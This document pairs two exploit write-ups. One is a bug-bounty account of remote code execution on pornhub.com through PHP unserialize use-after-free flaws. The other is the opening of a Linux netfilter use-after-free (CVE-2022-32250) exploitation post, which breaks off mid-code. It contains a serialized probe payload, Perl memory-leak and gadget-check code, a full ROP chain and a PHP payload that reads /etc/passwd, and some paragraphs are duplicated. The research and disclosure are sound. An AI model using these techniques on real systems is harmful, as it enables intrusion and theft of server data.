How we broke PHP, hacked Pornhub and earned $20,000

How we broke PHP, hacked Pornhub and earned $20,000

Original text by Ruslan Habalov

It all started by auditing Pornhub, then PHP and ended in breaking both…

tl;dr:

  • We have gained remote code execution on pornhub.com and have earned a $20,000 bug bounty on Hackerone.
  • We have found two use-after-free vulnerabilities in PHP’s garbage collection algorithm.
  • Those vulnerabilities were remotely exploitable over PHP’s unserialize function.
  • We were also awarded with $2,000 by the Internet Bug Bounty committee (c.f. Hackerone).

Credits:

This project was realized by Dario Weißer (@haxonaut), cutz and Ruslan Habalov (@evonide).
Many thanks go out to cutz for co-authoring this article.

Pornhub’s bug bounty program and its relatively high rewards on Hackerone caught our attention. That’s why we have taken the perspective of an advanced attacker with the full intent to get as deep as possible into the system, focusing on one main goal: gaining remote code execution capabilities. Thus, we left no stone unturned and attacked what Pornhub is built upon: PHP.

Bug discovery

After analyzing the platform we quickly detected the usage of unserialize on the website. Multiple paths (everywhere where you could upload hot pictures and so on) were affected for example:

  • http://www.pornhub.com/album_upload/create
  • http://www.pornhub.com/uploading/photo

In all cases a parameter named “cookie” got unserialized from POST data and afterwards reflected via Set-Cookie headers. Example Request:

Bug discovery

After analyzing the platform we quickly detected the usage of unserialize on the website. Multiple paths (everywhere where you could upload hot pictures and so on) were affected for example:

http://www.pornhub.com/album_upload/create
http://www.pornhub.com/uploading/photo
In all cases a parameter named “cookie” got unserialized from POST data and afterwards reflected via Set-Cookie headers. Example Request:

This could be further verified by sending a specially crafted array that contained an object:

tags=xyz&title=xyz...&cookie=a:1:{i:0;O:9:"Exception":0:{}}

Response layout:

0=exception 'Exception' in /path/to/a/file.php:1337
 Stack trace:
 #0 /path/to/a/file.php(1337): unserialize('a:1:{i:0;O:9:"E...')
 #1 {main}

This might strike as a harmless information disclosure at first sight, but generally it is known that using user input on unserialize is a bad idea:

Standard exploitation techniques require so called Property-Oriented-Programming (POP) that involve abusing already existing classes with specifically defined “magic methods” in order to trigger unwanted and malicious code paths. Unfortunately, it was difficult for us to gather any information about Pornhub’s used frameworks and PHP objects in general. Multiple classes from common frameworks have been tested — all without success.

Bug description

The core unserializer alone is relatively complex as it involves more than 1200 lines of code in PHP 5.6. Further, many internal PHP classes have their own unserialize methods. By supporting structures like objects, arrays, integers, strings or even references it is no surprise that PHP’s track record shows a tendency for bugs and memory corruption vulnerabilities. Sadly, there were no known vulnerabilities of such type for newer PHP versions like PHP 5.6 or PHP 7, especially because unserialize already got a lot of attention in the past (e.g. phpcodz). Hence, auditing it can be compared to squeezing an already tightly squeezed lemon. Finally, after so much attention and so many security fixes its vulnerability potential should have been drained out and it should be secure, shouldn’t it?

Fuzzing unserialize

To find an answer Dario implemented a fuzzer crafted specifically for fuzzing serialized strings which were passed to unserialize. Running the fuzzer with PHP 7 immediately lead to unexpected behavior. This behavior was not reproducible when tested against Pornhub’s server though. Thus, we assumed a PHP 5 version.

However, running the fuzzer against a newer version of PHP 5 just generated more than 1 TB of logs without any success. Eventually, after putting more and more effort into fuzzing we’ve stumbled upon unexpected behavior again. Several questions had to be answered: is the issue security related? If so can we only exploit it locally or also remotely? To further complicate this situation the fuzzer did generate non-printable data blobs with sizes of more than 200 KB.

Analyzing unexpected behavior

A tremendous amount of time was necessary to analyze potential issues. After all, we could extract a concise proof of concept of a working memory corruption bug — a so called use-after-free vulnerability! Upon further investigation we discovered that the root cause could be found in PHP’s garbage collection algorithm, a component of PHP that is completely unrelated to unserialize. However, the interaction of both components occurred only after unserialize had finished its job. Consequently, it was not well suited for remote exploitation. After further analysis, gaining a deeper understanding for the problem’s root causes and a lot of hard work a similar use-after-free vulnerability was found that seemed to be promising for remote exploitation.

Vulnerability links:

The high sophistication of the found PHP bugs and their discovery made it necessary to write separate articles. You can read more details in Dario’s fuzzing unserialize write-up.

In addition, we have written an article about Breaking PHP’s Garbage Collection and Unserialize.

Exploitation

Even this promising use-after-free vulnerability was considerably difficult to exploit. In particular, it involved multiple exploitation stages.
Since our main goal was to execute arbitrary code we needed to somehow compromise the CPU’s instruction pointer referred to as RIP on x86_64. This usually involves the following obstacles:

  1. The stack and heap (which also include any potential user-input) as well as any other writable segments are flagged non-executable (c.f. Executable space protection).
  2. Even if you are able to control the instruction pointer you need to know what you want to execute i.e. you need to have a valid address of an executable memory segment. For this it is common to call the libc function system which will execute a shell command. In PHP context it is often enough to execute zend_eval_string which usually gets executed e.g. when you write “eval(‘echo 1337;’);” in a PHP script i.e. it allows us to execute arbitrary PHP code without having to transition into other involved libraries.

The first problem can be overcome by using Return-oriented programming (ROP) where you can utilize already existing and executable memory fragments from the binary itself or its libraries. The second problem, however, requires to find the correct address of zend_eval_string. Usually, when a dynamically linked program gets executed the loader will map the process to 0x400000 which is the standard load address on x86_64. In case you somehow already obtained the correct PHP executable (e.g. by finding the exact package that is shipped by the target) you can just locally lookup the offset for any function you wantWe discovered that Pornhub was using a customly compiled version of php5-cgi, therefore making it difficult to determine the exact PHP version as well as getting any information at all about the memory layout of the whole PHP process.

Leaking the PHP binary and required pointers

Exploiting use-after-frees in PHP usually follows the same rules. As soon as you’re able to fill freed memory that later on gets reused as an internal PHP variable — so called zvals — you can generate vectors that allow reading from arbitrary memory as well as triggering code execution.

Preparing the memory disclosure

As previously mentioned we were required to obtain more information about Pornhub’s PHP binary. Therefore, the first step was to abuse the use-after-free to inject a zval that represents a PHP string. The definition of the zval structure looks like the following for PHP 5.6:

"Zend/zend.h"
[...]
struct _zval_struct {
    zvalue_value value;       /* value */
    zend_uint refcount__gc;
    zend_uchar type;          /* active type */
    zend_uchar is_ref__gc;
};

Whereas the zvalue_value field is defined as a union, hence making type juggling (and type confusions) easily possible.

"Zend/zend.h"
[...]
typedef union _zvalue_value {
    long lval;          /* long value */
    double dval;        /* double value */
    struct {
        char *val;
        int len;
    } str;
    HashTable *ht;      /* hash table value */
    zend_object_value obj;
    zend_ast *ast;
} 

A PHP variable of type string is a zval of type 6. Consequently, it treats the union as a structure that contains a char pointer and a length field. So crafting a string zval with an arbitrary starting point and arbitrary length creates a powerful infoleak that gets triggered when Pornhub’s setcookie() reflects the injected zval in the response header.

Finding PHP’s image base

Usually, one can start by leaking the binary, which as stated before, begins at 0x400000. Unfortunately, Pornhub’s server used protection mechanisms like PIE and ASLR which randomize the image base of the process and its shared libraries. This also has become the default as more and more distributions ship packages that enable position independent code.

The next challenge was on: finding the correct loading address of the binary.

The first difficulty was to somehow obtain a single valid address we could start leaking from. Here it was helpful to know some details about PHP’s internal memory management. In particular, once a zval is freed PHP will overwrite its first eight bytes with an address to the previously freed chunk. Hence, a trick to obtain a first valid address is to create an integer zval, free this integer zval and finally use a dangling pointer to this zval to obtain its current value.

Since php-cgi implements multiple workers that simply get forked from a master process, the memory layout never really changes between different requests, as long as you keep sending data of the same size. That’s also why we could send request after request, each time leaking a different portion of memory by letting the fake zval string begin at different addresses. However, obtaining the heap address of a freed chunk is by its own right not enough to get any clues about the executable location. This is due to a lack of any useful information in the surroundings of that chunk.

To get interesting addresses, there is a relatively complicated technique which requires multiple frees and allocations of PHP structures during the unserialization process (c.f. ROP in PHP applications Slide 67). Due to the nature of our bug and to keep the complexity as low as possible we have used our own trick.

By using a serialized string like “i:0;a:0:{}i:0;a:0:{}[…]i:0;a:0:{}” as part of our overall unserialize payload we could force unserialize to create many empty arrays and free them once it terminated. When initializing an array PHP consecutively allocates memory for its zval and hashtable. One default hashtable entry for empty arrays is the uninitialized_bucket symbol. Overall, we were able to obtain a memory fragment that looked similar to the following:

0x7ffff7fc2fe0: 0x0000000000000000 0x0000000000eae040
[...]
0x7ffff7fc3010: 0x00007ffff7fc2b40 0x0000000000000000
0x7ffff7fc3020: 0x0000000100000000 0x0000000000000000
0x7ffff7fc3030: # <--------- This address was leaked in a previous request.
0x7ffff7fc3040: 0x00007ffff7fc2f48 0x0000000000000000
0x7ffff7fc3050: 0x0000000000000000 0x0000000000000000
[...]
0x7ffff7fc30a0: 0x0000000000eae040 0x00000000006d5820
(gdb) x/xg 0x0000000000eae040
0xeae040 <uninitialized_bucket>: 0x0000000000000000

The address 0xeae040 is PHP’s uninitialized_bucket symbol address and directly points into PHP’s BSS segment. You can see that it occurs multiple times in the neighborhood of the lastly freed chunk. As stated before, many empty arrays were freed. Thus, by abusing the circumstance that some hashtable entries remained unchanged in the heap we were able to leak this specific symbol.

Finally, we could apply a page-wise backwards scan starting from the uninitialized_bucket symbol address to find the ELF header:

$start &= 0xfffffffffffff000;
$pages += 0x1000 while leak($start - $pages, 4) !~ /^\x7fELF/;
return $start - $pages;
Leaking interesting PHP binary segments

At this point our situation further complicated things as we were only able to leak 1 KB of data per request (this is due to enforced header size limitations by Pornhub’s web server). A PHP binary can take up to about 30 MB of size. Assuming one request per second the leaking would have taken about 8 hours and 20 minutes to complete. As we were afraid that our exploitation process could get interrupted at any time it was essential to act as fast and as stealthy as possible. This is why we were required to implement some heuristics to guess/filter likely interesting sections in advance. Nevertheless, we could resolve any structure that was referenced in the ELF’s string and symbol table. There are other techniques like ret2dlresolve that allow omitting the whole leaking process, but they weren’t entirely applicable here since they require crafting more data structures and require knowledge about different memory locations.

To get the address of zend_eval_string you’d first have to find the ELF program headers which are at offset 32, then scan forward until you find a program header entry of type 2 (PT_DYNAMIC) to get the ELF’s dynamic section. This section finally contains a reference to the string and symbol table (type 5 and 6) which you can completely dump by using their size fields and grab any function whose virtual address you desire. Alternatively, you can also use the hashtable (DT_HASH) to find functions more quickly, but in this scenario it doesn’t matter much since you can quickly traverse the tables locally anyway. In addition to zend_eval_stringwe were interested in further symbols and the location of our POST variables (because they were supposed to be used as a ROP stack later on).

Leaking the address of our POST data

To get the address of the supplied POST data you can just leak some more pointers by reading from:

(*(*(php_stream_temp_data *)(sapi_globals.request_info.request_body.abstract)).innerstream).readbuf

Traversing this chain looks complicated, but you just need to dereference a few pointers with the correct offset and you’ll quickly find the stdin:// stream which points to the POST data inside the heap.

Preparing the ROP payload

The second part deals with actually taking control over the PHP process and gaining code execution. For this to happen we need to discuss how one can modify the instruction pointer first.

Taking over the instruction pointer

We adjusted our payload to contain a fake object (instead of the previously used string zval) with a pointer to a specially crafted zend_object_handlers table. This table is, in its essence, an array of function pointers whose structure definition can be found in:

"Zend/zend_object_handlers.h"
[...]
struct _zend_object_handlers {
    zend_object_add_ref_t add_ref;
[...]
};

When creating such a faked zend_object_handlers table we can simply setup add_ref however we prefer. The function behind this pointer usually handles the incrementation of the object’s reference counter. Once our created fake object gets passed as a parameter to “setcookie” the following things happen:

#0  _zval_copy_ctor
#1  0x0000000000881d01 in parse_arg_object_to_string
[...]
#5  0x00000000008845ca in zend_parse_parameters (num_args=2, type_spec=0xd24e46 "s|slssbb")
#6  0x0000000000748ad5 in zif_setcookie
[...]
#14 0x000000000093e492 in main

Here, according to “s|sl[…]” one can see that “setcookie” is expecting a string as its first and second parameter (| marks the start of optional parameters). Hence, it will try to cast our object which is passed as the second parameter into a string. Finally, _zval_copy_ctor will then execute:

"Zend/zend_variables.c"
[...]
ZEND_API void _zval_copy_ctor_func(zval *zvalue ZEND_FILE_LINE_DC)
{
[...]
        case IS_OBJECT:
            {
                TSRMLS_FETCH();
                Z_OBJ_HT_P(zvalue)->add_ref(zvalue TSRMLS_CC);
[...]
}

Here, according to “s|sl[…]” one can see that “setcookie” is expecting a string as its first and second parameter (| marks the start of optional parameters). Hence, it will try to cast our object which is passed as the second parameter into a string. Finally, _zval_copy_ctor will then execute:

"Zend/zend_variables.c"
[...]
ZEND_API void _zval_copy_ctor_func(zval *zvalue ZEND_FILE_LINE_DC)
{
[...]
        case IS_OBJECT:
            {
                TSRMLS_FETCH();
                Z_OBJ_HT_P(zvalue)->add_ref(zvalue TSRMLS_CC);
[...]
}

In particular, this will make a call to the provided add_ref function with the address of our object as a parameter (c.f. PHP Internals Book – Copying zvals to see an explanation). The corresponding assembly looks like:

<_zval_copy_ctor_func+288>: mov    0x8(%rdi),%rax
<_zval_copy_ctor_func+292>: callq  *(%rax)

Here, RDI is the first argument to the _zval_copy_ctor_func  function which also is the address of our fake object zval (zvalue in the source code above). As previously seen in the definition of the  _zvalue_valuetypedef, an object contains an element called obj of type zend_object_value which is defined as follows:

"Zend/zend_types.h"
[...]
typedef struct _zend_object_value {
    zend_object_handle handle;
    const zend_object_handlers *handlers;
} zend_object_value;

Thus, 0x8(%rdi) will point to the second entry in  _zend_object_value which corresponds to the address of our first zend_object_handlers entry. As mentioned before, this entry is our custom add_ref function and explains why we have direct control over RAX, too.

To bypass the previously discussed non-executable memory problem we had to obtain further information. In particular, we needed to collect useful gadgets and prepare stack pivoting for our ROP chain since there wasn’t enough control over the stack yet.

Leaking ROP gadgets

Now we could setup the add_ref pointer, or RAX respectively, to take over the instruction pointer. Although this gives you a starting point it doesn’t ensure that all of your provided ROP gadgets are executed because the CPU will pop the next instruction’s address from the current stack once returning from the first gadget. We don’t have any control over this stack, so consequently, it was necessary to pivot the stack into our ROP chain. This is why the next step was to copy RAX into RSP and continue ropping from there. Using a locally compiled version of PHP we scanned for good candidates for stack pivoting gadgets and found that php_stream_bucket_split contained the following piece of code:

<php_stream_bucket_split+381>: push %rax    # <------------
<php_stream_bucket_split+382>: sub $0x31,%al
<php_stream_bucket_split+384>: rcrb $0x41,0x5d(%rbx)
<php_stream_bucket_split+388>: pop %rsp     # <------------
<php_stream_bucket_split+389>: pop %r13
<php_stream_bucket_split+391>: pop %r14
<php_stream_bucket_split+393>: retq

This was used to nicely modify RSP to point to our by POST data provided ROP chain, effectively chaining all provided gadget calls.

According to the x86_64 calling convention the first two parameters of a function are RDI and RSI, so we had to find a pop %rdi and pop %rsi gadget, tooThose are pretty common and thus easily found. However, we still had no idea if those gadgets actually existed on Pornhub’s version of PHP. Therefore, we had to manually verify their presence.

Verifying the presence of the required ROP gadgets

The infoleak vector allowed us to quickly dump the disassembly of php_stream_bucket_split and check if our stack pivoting gadget was available on the remote version. Fortunately, only little corrections of the gadgets’ offsets were necessary. Finally, we implemented some checks to confirm that all addresses were correct:

my $pivot  = leak($php_base + 0x51a71f, 13);
my $poprdi = leak($php_base + 0x2b904e, 2);
my $poprsi = leak($php_base + 0x50ee0c, 2);
 
die '[!] pivot gadget doesnt seem to be right', $/
    unless ($pivot eq "\x50\x2c\x31\xc0\x5b\x5d\x41\x5c\x41\x5d\x41\x5e\xc3");
 
die '[!] poprdi gadget doesnt seem to be right', $/
    unless ($poprdi eq "\x5f\xc3");
 
die '[!] poprsi gadget doesnt seem to be right', $/
    unless ($poprsi eq "\x5e\xc3");
Crafting the ROP stack

The final ROP payload that effectively executed zend_eval_string(code); exit(0); looked like the following snippet:

my $rop = "";
$rop .= pack('Q', $php_base + 0x51a71f);              # pivot rsp
$rop .= pack('Q', 0xdeadbeef);                        # junk
$rop .= pack('Q', $php_base + 0x2b904e);              # pop rdi
$rop .= pack('Q', $post_addr + length($rop) + 8 * 7); # pointing to $php_code
$rop .= pack('Q', $php_base + 0x50ee0c);              # pop rsi
$rop .= pack('Q', 0);                                 # retval_ptr
$rop .= pack('Q', $zend_eval_string);                 # zend_eval_string
$rop .= pack('Q', $php_base + 0x2b904e);              # pop rdi
$rop .= pack('Q', 0);                                 # exit code
$rop .= pack('Q', $exit);                             # exit
$rop .= $php_code . "\x00";

Because the stack pivot contained a pop %r13 and pop %r14 the 0xdeadbeef padding inside the remaining chain was necessary to continue with setting RDI. As the first parameter to zend_eval_string RDI is required to reference the code that is to be executed. This code is located right after the ROP chain. It was also required to keep sending the exact same amount of data between each request so that all calculated offsets stayed correct. This was achieved by setting up different paddings wherever it was necessary.

The next step was to finally trigger code execution by returning back into the PHP interpreter. Actually, other techniques like return2libc are quite applicable as well but create a few other problems that are easier dealt with when staying in PHP context.

Returning into PHP

Being able to execute arbitrary PHP code is an important step, but being able to view its output is equally important, unless one wants to deal with side channels to receive responses. So the remaining tricky part was to somehow display the result on Pornhub’s website.

Clean termination of PHP

Usually php-cgi forwards the generated content back to the web server so that it’s displayed on the website, but wrecking the control flow that badly creates an abnormal termination of PHP so that its result will never reach the HTTP server. To get around this problem we simply told PHP to use direct unbuffered responses that are usually used for HTTP streaming:

my $php_code = 'eval(\'
    header("X-Accel-Buffering: no");
    header("Content-Encoding: none");
    header("Connection: close");
    error_reporting(0);
    echo file_get_contents("/etc/passwd");
    ob_end_flush();
    ob_flush();
    flush();
\');';

This finally allowed us to directly fetch every output the PHP payload generated without having to worry about the cleanup routines that are usually involved when the CGI process sends data to the web server. This further increased the stealthiness factor by minimizing the number of potential errors and crashes.

To summarize, our payload contained a fake object with its add_ref function pointer pointing to our first ROP gadget. The following diagram visualizes this concept:

Together with our ROP stack which was provided over POST data our payload did the following things:

  1. Created our fake object which was later on passed as a parameter to “setcookie”.
  2. This caused a call to the provided add_ref function i.e. it allowed us to gain program counter control.
  3. Our ROP chain then prepared all registers/parameters as discussed.
  4. Next, we were able to execute arbitrary PHP code by making a call to zend_eval_string.
  5. Finally, we caused a clean process termination while also fetching the output from the response body.

Once running the above code we were in and got a nice view of Pornhub’s ‘/etc/passwd’ file. Due to the nature of our attack we would have also been able to execute other commands or actually break out of PHP to run arbitrary syscalls. However, just using PHP was more convenient at this point. Finally, we dumped a few details about the underlying system and immediately wrote and submitted a report to Pornhub over Hackerone.

Timeline

Here is the timeline of the disclosure process:

  • 2016-05-30 Hacked Pornhub and submitted the issue over Hackerone. Hours later Pornhub quickly fixed the issue by removing calls to unserialize
  • 2016-06-14 Received a reward of $20,000
  • 2016-06-16 Submitted issues to bugs.php.net
  • 2016-06-21 Both bugs got fixed in PHP’s security repository
  • 2016-06-27 Received Hackerone IBB reward of $2,000 ($1,000 for each vulnerability)
  • 2016-07-22 Pornhub resolved the issue on Hackerone

Conclusion

We gained remote code execution and would’ve been able to do the following things:

  • Dump the complete database of pornhub.com including all sensitive user information.
  • Track and observe user behavior on the platform.
  • Leak the complete available source code of all sites hosted on the server.
  • Escalate further into the network or root the system.

Of course none of the above things were done and very careful attention was paid to respect the scope and limitations of the bug bounty program.
Further, we were able to find two zero day vulnerabilities in PHP’s garbage collection algorithm. Those vulnerabilities, although being in a very different PHP context, could be reliably and remotely exploited in an unserialize context, too.

It is well-known that using user input on unserialize is a bad idea. In particular, about 10 years have passed since its first weaknesses have become apparent. Unfortunately, even today, many developers seem to believe that unserialize is only dangerous in old PHP versions or when combined with unsafe classes. We sincerely hope to have destroyed this misbelief. Please finally put a nail into unserialize’s coffin so that the following mantra becomes obsolete.

You should never use user input on unserialize. Assuming that using an up-to-date PHP version is enough to protect unserialize in such scenarios is a bad idea. Avoid it or use less complex serialization methods like JSON.

The newest PHP versions contain fixes by now. Hence, you should update your PHP 5 and PHP 7 versions accordingly.

Many thanks to the Pornhub team for:

  • Very polite and competent responses.
  • Actually caring about security (and not just pretending like many other companies do nowadays).
  • Being very generous regarding the bounty of $20,000.
    According to Sinthetic Labs’s Public Hackerone Reports last update we are grateful to see that this submission seems to be heads on with the ShellShock vulnerability submission for being one of the highest paid public bounties on Hackerone so far.

Further, many thanks go out to the PHP developers for quickly deploying the fix and the Internet Bug Bounty committee for awarding us with $2,000.

Finally, we want to highlight the necessity of such programs. As you can see, offering high bug bounties can motivate security researchers to find bugs in underlying software. This positively impacts other sites and unrelated services as well.

Please don’t forget to checkout our two other write-ups regarding the PHP bugs and their discovery.

Linux Kernel: Exploiting a Netfilter Use-after-Free in kmalloc-cg

Linux Kernel: Exploiting a Netfilter Use-after-Free in kmalloc-cg

Original text by Sergi Martinez

Overview

It’s been a while since our last technical blogpost, so here’s one right on time for the Christmas holidays. We describe a method to exploit a use-after-free in the Linux kernel when objects are allocated in a specific slab cache, namely the 

kmalloc-cg
 series of SLUB caches used for cgroups. This vulnerability is assigned CVE-2022-32250 and exists in Linux kernel versions 5.18.1 and prior.

The use-after-free vulnerability in the Linux kernel netfilter subsystem was discovered by NCC Group’s Exploit Development Group (EDG). They published a very detailed write-up with an in-depth analysis of the vulnerability and an exploitation strategy that targeted Linux Kernel version 5.13. Additionally, Theori published their own analysis and exploitation strategy, this time targetting the Linux Kernel version 5.15. We strongly recommend having a thorough read of both articles to better understand the vulnerability prior to reading this post, which almost exclusively focuses on an exploitation strategy that works on the latest vulnerable version of the Linux kernel, version 5.18.1.

The aforementioned exploitation strategies are different from each other and from the one detailed here since the targeted kernel versions have different peculiarities. In version 5.13, allocations performed with either the 

GFP_KERNEL
 flag or the 
GFP_KERNEL_ACCOUNT
 flag are served by the 
kmalloc-*
 slab caches. In version 5.15, allocations performed with the 
GFP_KERNEL_ACCOUNT
 flag are served by the 
kmalloc-cg-*
 slab caches. While in both 5.13 and 5.15 the affected object, 
nft_expr,
 is allocated using 
GFP_KERNEL,&nbsp;
the difference in exploitation between them arises because a commonly used heap spraying object, the System V message structure (
struct msg_msg)
, is served from 
kmalloc-*
 in 5.13 but from 
kmalloc-cg-*
 in 5.15. Therefore, in 5.15, 
struct msg_msg
 cannot be used to exploit this vulnerability.

In 5.18.1, the object involved in the use-after-free vulnerability, 

nft_expr,&nbsp;
is itself allocated with 
GFP_KERNEL_ACCOUNT
 in the 
kmalloc-cg-*
 slab caches. Since the exploitation strategies presented by the NCC Group and Theori rely on objects allocated with  
GFP_KERNEL,&nbsp;
they do not work against the latest vulnerable version of the Linux kernel.

The subject of this blog post is to present a strategy that works on the latest vulnerable version of the Linux kernel.

Vulnerability

Netfilter sets can be created with a maximum of two associated expressions that have the 

NFT_EXPR_STATEFUL
 flag. The vulnerability occurs when a set is created with an associated expression that does not have the 
NFT_EXPR_STATEFUL
 flag, such as the 
dynset
 and 
lookup
 expressions. These two expressions have a reference to another set for updating and performing lookups, respectively. Additionally, to enable tracking, each set has a bindings list that specifies the objects that have a reference to them.

During the allocation of the associated 

dynset
 or 
lookup
 expression objects, references to the objects are added to the bindings list of the referenced set. However, when the expression associated to the set does not have the 
NFT_EXPR_STATEFUL
 flag, the creation is aborted and the allocated expression is destroyed. The problem occurs during the destruction process where the bindings list of the referenced set is not updated to remove the reference, effectively leaving a dangling pointer to the freed expression object. Whenever the set containing the dangling pointer in its bindings list is referenced again and its bindings list has to be updated, a use-after-free condition occurs.

Exploitation

Before jumping straight into exploitation details, first let’s see the definition of the structures involved in the vulnerability: 

nft_set
nft_expr
nft_lookup
, and 
nft_dynset
.

// Source: https://elixir.bootlin.com/linux/v5.18.1/source/include/net/netfilter/nf_tables.h#L502

struct nft_set {
        struct list_head           list;                 /*     0    16 */
        struct list_head           bindings;             /*    16    16 */
        struct nft_table *         table;                /*    32     8 */
        possible_net_t             net;                  /*    40     8 */
        char *                     name;                 /*    48     8 */
        u64                        handle;               /*    56     8 */
        /* --- cacheline 1 boundary (64 bytes) --- */
        u32                        ktype;                /*    64     4 */
        u32                        dtype;                /*    68     4 */
        u32                        objtype;              /*    72     4 */
        u32                        size;                 /*    76     4 */
        u8                         field_len[16];        /*    80    16 */
        u8                         field_count;          /*    96     1 */

        /* XXX 3 bytes hole, try to pack */

        u32                        use;                  /*   100     4 */
        atomic_t                   nelems;               /*   104     4 */
        u32                        ndeact;               /*   108     4 */
        u64                        timeout;              /*   112     8 */
        u32                        gc_int;               /*   120     4 */
        u16                        policy;               /*   124     2 */
        u16                        udlen;                /*   126     2 */
        /* --- cacheline 2 boundary (128 bytes) --- */
        unsigned char *            udata;                /*   128     8 */

        /* XXX 56 bytes hole, try to pack */

        /* --- cacheline 3 boundary (192 bytes) --- */
        const struct nft_set_ops  * ops __attribute__((__aligned__(64))); /*   192     8 */
        u16                        flags:14;             /*   200: 0  2 */
        u16                        genmask:2;            /*   200:14  2 */
        u8                         klen;                 /*   202     1 */
        u8                         dlen;                 /*   203     1 */
        u8                         num_exprs;            /*   204     1 */

        /* XXX 3 bytes hole, try to pack */

        struct nft_expr *          exprs[2];             /*   208    16 */
        struct list_head           catchall_list;        /*   224    16 */
        unsigned char              data[] __attribute__((__aligned__(8))); /*   240     0 */

        /* size: 256, cachelines: 4, members: 29 */
        /* sum members: 176, holes: 3, sum holes: 62 */
        /* sum bitfield members: 16 bits (2 bytes) */
        /* padding: 16 */
        /* forced alignments: 2, forced holes: 1, sum forced holes: 56 */
} __attribute__((__aligned__(64)));

The 

nft_set
 structure represents an nftables set, a built-in generic infrastructure of nftables that allows using any supported selector to build sets, which makes possible the representation of maps and verdict maps (check the corresponding nftables wiki entry for more details).

// Source: https://elixir.bootlin.com/linux/v5.18.1/source/include/net/netfilter/nf_tables.h#L347

/**
 *	struct nft_expr - nf_tables expression
 *
 *	@ops: expression ops
 *	@data: expression private data
 */
struct nft_expr {
	const struct nft_expr_ops	*ops;
	unsigned char			data[]
		__attribute__((aligned(__alignof__(u64))));
};

The 

nft_expr
 structure is a generic container for expressions. The specific expression data is stored within its 
data
 member. For this particular vulnerability the relevant expressions are 
nft_lookup
 and 
nft_dynset
, which are used to perform lookups on sets or update dynamic sets respectively.

// Source: https://elixir.bootlin.com/linux/v5.18.1/source/net/netfilter/nft_lookup.c#L18

struct nft_lookup {
        struct nft_set *           set;                  /*     0     8 */
        u8                         sreg;                 /*     8     1 */
        u8                         dreg;                 /*     9     1 */
        bool                       invert;               /*    10     1 */

        /* XXX 5 bytes hole, try to pack */

        struct nft_set_binding     binding;              /*    16    32 */

        /* XXX last struct has 4 bytes of padding */

        /* size: 48, cachelines: 1, members: 5 */
        /* sum members: 43, holes: 1, sum holes: 5 */
        /* paddings: 1, sum paddings: 4 */
        /* last cacheline: 48 bytes */
};

nft_lookup
 expressions have to be bound to a given set on which the lookup operations are performed.

// Source: https://elixir.bootlin.com/linux/v5.18.1/source/net/netfilter/nft_dynset.c#L15

struct nft_dynset {
        struct nft_set *           set;                  /*     0     8 */
        struct nft_set_ext_tmpl    tmpl;                 /*     8    12 */

        /* XXX last struct has 1 byte of padding */

        enum nft_dynset_ops        op:8;                 /*    20: 0  4 */

        /* Bitfield combined with next fields */

        u8                         sreg_key;             /*    21     1 */
        u8                         sreg_data;            /*    22     1 */
        bool                       invert;               /*    23     1 */
        bool                       expr;                 /*    24     1 */
        u8                         num_exprs;            /*    25     1 */

        /* XXX 6 bytes hole, try to pack */

        u64                        timeout;              /*    32     8 */
        struct nft_expr *          expr_array[2];        /*    40    16 */
        struct nft_set_binding     binding;              /*    56    32 */

        /* XXX last struct has 4 bytes of padding */

        /* size: 88, cachelines: 2, members: 11 */
        /* sum members: 81, holes: 1, sum holes: 6 */
        /* sum bitfield members: 8 bits (1 bytes) */
        /* paddings: 2, sum paddings: 5 */
        /* last cacheline: 24 bytes */
};

nft_dynset
 expressions have to be bound to a given set on which the add, delete, or update operations will be performed.

When a given 

nft_set
 has expressions bound to it, they are added to the 
nft_set.bindings
 double linked list. A visual representation of an 
nft_set
 with 2 expressions is shown in the diagram below.

The 

binding
 member of the 
nft_lookup
 and 
nft_dynset
 expressions is defined as follows:

// Source: https://elixir.bootlin.com/linux/v5.18.1/source/include/net/netfilter/nf_tables.h#L576

/**
 *	struct nft_set_binding - nf_tables set binding
 *
 *	@list: set bindings list node
 *	@chain: chain containing the rule bound to the set
 *	@flags: set action flags
 *
 *	A set binding contains all information necessary for validation
 *	of new elements added to a bound set.
 */
struct nft_set_binding {
	struct list_head		list;
	const struct nft_chain		*chain;
	u32				flags;
};

The important member in our case is the 

list
 member. It is of type 
struct list_head
, the same as the 
nft_lookup.binding
 and 
nft_dynset.binding
 members. These are the foundation for building a double linked list in the kernel. For more details on how linked lists in the Linux kernel are implemented refer to this article.

With this information, let’s see what the vulnerability allows to do. Since the UAF occurs within a double linked list let’s review the common operations on them and what that implies in our scenario. Instead of showing a generic example, we are going to use the linked list that is build with the 

nft_set
 and the expressions that can be bound to it.

In the diagram shown above, the simplified pseudo-code for removing the 

nft_lookup
 expression from the list would be:

nft_lookup.binding.list->prev->next = nft_lookup.binding.list->next
nft_lookup.binding.list->next->prev = nft_lookup.binding.list->prev

This code effectively writes the address of 

nft_dynset.binding
 in 
nft_set.bindings.next
, and the address of 
nft_set.bindings
 in 
nft_dynset.binding.list-&gt;prev
. Since the 
binding
 member of 
nft_lookup
 and 
nft_dynset
 expressions are defined at different offsets, the write operation is done at different offsets.

With this out of the way we can now list the write primitives that this vulnerability allows, depending on which expression is the vulnerable one:

  • nft_lookup
    : Write an 8-byte address at offset 24 (
    binding.list-&gt;next
    ) or offset 32 (
    binding.list-&gt;prev
    ) of a freed 
    nft_lookup
     object.
  • nft_dynset
    : Write an 8-byte address at offset 64 (
    binding.list-&gt;next
    ) or offset 72 (
    binding.list-&gt;prev
    ) of a freed 
    nft_dynset
     object.

The offsets mentioned above take into account the fact that 

nft_lookup
 and 
nft_dynset
 expressions are bundled in the 
data
 member of an 
nft_expr
 object (the data member is at offset 8).

In order to do something useful with the limited write primitves that the vulnerability offers we need to find objects allocated within the same slab caches as the 

nft_lookup
 and 
nft_dynset
 expression objects that have an interesting member at the listed offsets.

As mentioned before, in Linux kernel 5.18.1 the 

nft_expr
 objects are allocated using the 
GFP_KERNEL_ACCOUNT
 flag, as shown below.

// Source: https://elixir.bootlin.com/linux/v5.18.1/source/net/netfilter/nf_tables_api.c#L2866

static struct nft_expr *nft_expr_init(const struct nft_ctx *ctx,
				      const struct nlattr *nla)
{
	struct nft_expr_info expr_info;
	struct nft_expr *expr;
	struct module *owner;
	int err;

	err = nf_tables_expr_parse(ctx, nla, &expr_info);
	if (err < 0)
            goto err1;
        err = -ENOMEM;

        expr = kzalloc(expr_info.ops->size, GFP_KERNEL_ACCOUNT);
	if (expr == NULL)
	    goto err2;

	err = nf_tables_newexpr(ctx, &expr_info, expr);
	if (err < 0)
            goto err3;

        return expr;
err3:
        kfree(expr);
err2:
        owner = expr_info.ops->type->owner;
	if (expr_info.ops->type->release_ops)
